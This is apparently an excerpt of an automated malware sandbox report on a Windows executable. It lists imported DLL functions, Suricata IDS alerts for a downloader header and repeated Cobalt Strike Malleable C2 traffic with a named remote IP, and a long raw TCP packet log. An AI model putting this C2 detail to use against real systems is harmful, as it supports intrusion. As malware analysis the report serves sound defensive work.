                                                                                                                            MSVCP140.dll?_Xout_of_range@std@@YAXPEBD@Z, ?_Xlength_error@std@@YAXPEBD@Z
                                                                                                                            WS2_32.dllconnect, WSACleanup, closesocket, gethostbyname, socket, htons, WSAStartup, inet_addr, gethostbyaddr, send, recv
                                                                                                                            VCRUNTIME140.dll__std_exception_copy, __std_exception_destroy, __C_specific_handler, memset, strstr, __CxxFrameHandler3, memcmp, memcpy, _CxxThrowException, memchr, memmove
                                                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf, _set_fmode, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
                                                                                                                            api-ms-win-crt-heap-l1-1-0.dllmalloc, free, realloc, _callnewh, _set_new_mode
                                                                                                                            api-ms-win-crt-string-l1-1-0.dllstrncpy
                                                                                                                            api-ms-win-crt-runtime-l1-1-0.dll_register_onexit_function, _crt_atexit, __p___argv, _register_thread_local_exe_atexit_callback, __p___argc, _exit, _cexit, terminate, _invalid_parameter_noinfo_noreturn, exit, _initterm_e, _initterm, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _initialize_onexit_table, _get_initial_narrow_environment
                                                                                                                            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-19T23:12:10.800926+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497043.79.209.7680TCP
                                                                                                                            2024-12-19T23:12:14.340202+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549705TCP
                                                                                                                            2024-12-19T23:12:17.271253+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549706TCP
                                                                                                                            2024-12-19T23:12:19.484501+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549707TCP
                                                                                                                            2024-12-19T23:12:21.689438+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549708TCP
                                                                                                                            2024-12-19T23:12:23.938801+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549710TCP
                                                                                                                            2024-12-19T23:12:26.146640+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549717TCP
                                                                                                                            2024-12-19T23:12:28.623297+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549725TCP
                                                                                                                            2024-12-19T23:12:30.852350+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549731TCP
                                                                                                                            2024-12-19T23:12:33.070480+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549738TCP
                                                                                                                            2024-12-19T23:12:35.362742+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549744TCP
                                                                                                                            2024-12-19T23:12:37.619541+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549750TCP
                                                                                                                            2024-12-19T23:12:39.835436+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549756TCP
                                                                                                                            2024-12-19T23:12:42.073130+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549762TCP
                                                                                                                            2024-12-19T23:12:44.255883+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549768TCP
                                                                                                                            2024-12-19T23:12:46.455049+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549773TCP
                                                                                                                            2024-12-19T23:12:48.678819+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549780TCP
                                                                                                                            2024-12-19T23:12:50.867126+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549786TCP
                                                                                                                            2024-12-19T23:12:53.332796+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549792TCP
                                                                                                                            2024-12-19T23:12:55.536771+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549798TCP
                                                                                                                            2024-12-19T23:12:57.727238+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549804TCP
                                                                                                                            2024-12-19T23:12:59.923490+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549810TCP
                                                                                                                            2024-12-19T23:13:02.414598+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549816TCP
                                                                                                                            2024-12-19T23:13:04.713196+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549822TCP
                                                                                                                            2024-12-19T23:13:07.154589+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549829TCP
                                                                                                                            2024-12-19T23:13:09.360049+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549835TCP
                                                                                                                            2024-12-19T23:13:11.606752+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549843TCP
                                                                                                                            2024-12-19T23:13:13.817857+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549850TCP
                                                                                                                            2024-12-19T23:13:16.063530+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549856TCP
                                                                                                                            2024-12-19T23:13:18.263363+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549862TCP
                                                                                                                            2024-12-19T23:13:20.465077+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549868TCP
                                                                                                                            2024-12-19T23:13:22.680981+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549874TCP
                                                                                                                            2024-12-19T23:13:24.872501+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549880TCP
                                                                                                                            2024-12-19T23:13:27.078589+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549886TCP
                                                                                                                            2024-12-19T23:13:29.294801+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549892TCP
                                                                                                                            2024-12-19T23:13:31.653829+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549898TCP
                                                                                                                            2024-12-19T23:13:33.854578+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549905TCP
                                                                                                                            2024-12-19T23:13:36.041029+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549911TCP
                                                                                                                            2024-12-19T23:13:38.282346+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549917TCP
                                                                                                                            2024-12-19T23:13:40.479064+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549923TCP
                                                                                                                            2024-12-19T23:13:42.717053+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549929TCP
                                                                                                                            2024-12-19T23:13:44.941571+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549935TCP
                                                                                                                            2024-12-19T23:13:47.126874+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549941TCP
                                                                                                                            2024-12-19T23:13:49.326528+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549947TCP
                                                                                                                            2024-12-19T23:13:51.544160+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549953TCP
                                                                                                                            2024-12-19T23:13:53.759357+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549959TCP
                                                                                                                            2024-12-19T23:13:56.110383+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549965TCP
                                                                                                                            2024-12-19T23:13:58.344816+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549971TCP
                                                                                                                            2024-12-19T23:14:00.557948+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549977TCP
                                                                                                                            2024-12-19T23:14:02.791434+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549983TCP
                                                                                                                            2024-12-19T23:14:05.015988+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549989TCP
                                                                                                                            2024-12-19T23:14:07.229524+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.549995TCP
                                                                                                                            2024-12-19T23:14:09.453436+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.550001TCP
                                                                                                                            2024-12-19T23:14:11.708964+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.550007TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 19, 2024 23:12:09.238477945 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:09.535039902 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:09.536974907 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:09.537360907 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:09.658827066 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.800759077 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.800867081 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.800889015 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.800925970 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.801400900 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.801418066 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.801434040 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.801464081 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.801496029 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.802160978 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.802179098 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.802194118 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.802234888 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.802862883 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.802923918 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.920595884 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.920656919 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.920725107 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.925595045 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.973777056 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.992961884 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.993022919 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.993141890 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:10.996995926 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.997163057 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:10.997234106 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.003609896 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.003686905 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.003763914 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.012083054 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.012181997 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.012334108 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.020765066 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.020837069 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.021001101 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.029211998 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.029325008 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.029392958 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.038090944 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.038145065 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.038364887 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.046371937 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.046458006 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.046624899 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.054807901 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.054965019 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.055160999 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.063292980 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.063580036 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.063760996 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.093710899 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.093770027 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.093882084 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.097809076 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.129985094 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.130038977 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.130105019 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.176805019 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.184915066 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.185007095 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.185167074 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.186273098 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.186415911 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.186486006 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.191279888 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.191396952 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.191478014 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.196196079 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.196429968 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.196491003 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.201180935 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.201317072 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.201379061 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.206079006 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.206186056 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.206362963 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.211045027 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.211138010 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.211199045 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.215975046 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.216115952 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.216175079 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.220953941 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.221040964 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.221199989 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.225959063 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.226231098 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.226433992 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.231218100 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.231273890 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.231431007 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.235878944 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.235955000 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.236020088 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.240780115 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.240895987 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.240962029 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.245743990 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.245868921 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.246045113 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.250973940 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.251065969 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.251234055 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.255722046 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.255780935 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.256016970 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.260691881 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.260746956 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.260817051 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.265547037 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.265640020 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.265705109 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.270443916 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.270617008 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.270684958 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.275329113 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.275428057 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.275511026 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.280280113 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.280373096 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.280458927 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.285185099 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.285276890 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.285427094 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.296652079 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.321789026 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.321907043 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.322113991 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.324316025 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.324398041 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.435816050 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.435893059 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.435964108 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.437160969 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.437278986 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.437350035 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.439599991 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.439779997 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.439852953 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.442354918 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.442481041 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.442636967 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.444881916 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.444978952 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.445048094 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.447423935 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.447748899 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.447839975 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.449737072 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.449856997 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.449951887 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.451992035 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.452111006 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.452183962 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.454252005 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.454377890 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.454441071 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.456535101 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.456651926 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.456721067 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.458782911 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.458900928 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.458976984 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.461077929 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.461191893 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.461294889 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.463387966 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.463531971 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.463643074 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.465626955 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.465755939 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.465841055 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.467849970 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.467967033 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.468035936 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.470141888 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.470217943 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.470285892 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.472441912 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.472569942 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.472632885 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.474638939 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.474780083 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.474849939 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.476934910 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.477071047 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.477135897 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.479259014 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.479443073 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.479510069 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.481503010 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.481614113 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.481679916 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.483792067 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.483916044 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.483978987 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.485999107 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.486126900 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.486202955 CET4970480192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:12:11.488276958 CET80497043.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:11.488374949 CET80497043.79.209.76192.168.2.5
